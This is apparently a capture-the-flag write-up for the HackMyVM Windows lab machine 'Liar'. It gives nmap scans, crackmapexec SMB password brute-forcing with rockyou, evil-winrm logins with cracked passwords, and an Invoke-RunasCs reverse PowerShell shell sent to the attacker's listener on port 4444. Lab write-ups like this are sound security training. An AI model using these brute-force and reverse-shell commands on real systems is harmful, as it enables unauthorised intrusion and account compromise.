LiarSeptember 21, 2024 Created by Page Difficulty OS sml HackMyVm Easy Windows I start with a scan of the open ports, nmap -p- --open -vvv -sS --min-rate 5000 -Pn -oG scan 192.168.56.103 Scanning open ports. nmap -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 -sCV 192.168.56.103 -oN ports I access to the website. I discover a potential user, I try to brute force his password with crackmapexec through the smb service. crackmapexec smb 192.168.56.103 -u nica -p /usr/share/wordlists/rockyou.txt --local-auth I log in as a nica with evil-winrm evil-winrm -i 192.168.56.103 -u nica -p hardcore I find the first flag and find another potential user. I discover a potential user, I try to brute force his password with crackmapexec through the smb service. crackmapexec smb 192.168.56.103 -u akanksha -p /usr/share/wordlists/rockyou.txt --local-auth I try to connect as akanksha with evil-winrm but it does not allow me to connect. evil-winrm -i 192.168.56.103 -u akanksha -p sweetgirl As it does not allow us to log in as akanksha, we can try to run commands as that user and create a revershell. For that we can use Runas. RunasCs We import the module and run the revershell as akanksha to my machine. Import-module ./Invoke-RunasCs.ps1 Invoke-RunasCs akanksha sweetgirl powershell -Remote 192.168.56.1:4444 This user has permissions to view the root flag.